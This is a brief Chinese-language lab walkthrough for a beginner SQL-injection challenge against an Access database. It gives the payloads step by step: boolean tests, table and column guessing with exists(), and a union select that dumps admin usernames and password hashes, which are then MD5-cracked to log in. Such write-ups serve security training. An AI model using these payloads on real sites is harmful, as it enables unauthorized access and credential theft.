SQL手工注入漏洞测试(Access数据库)
难易程度:★
题目类型:SQL注入
使用工具:FireFox浏览器
1.打开靶场,寻找注入点。
确定了公告页面可以注入。
2.输入id=1 and 1=1,返回正常页面。
输入id=1 and 1=2,则返回空白页。
3.猜测数据库的表名,输入id=1 and exists(select * from admin),返回正常页面,证明猜对了。
4.猜测存在的列名,输入id=1 and exists(select id from admin),返回正常页面,证明存在该列名。
尝试了id=1 and exists(select username from admin)也返回正常页面。
尝试id=1 and exists(select password from admin)返回空白页,证明密码的列名猜错了。
把password改为passwd,返回正常页面!
5.最后输入id=1 union select 1,username,passwd,4 from admin,显示用户名和密码。
6.把密码通过md5解密
7.登录成功,获取key。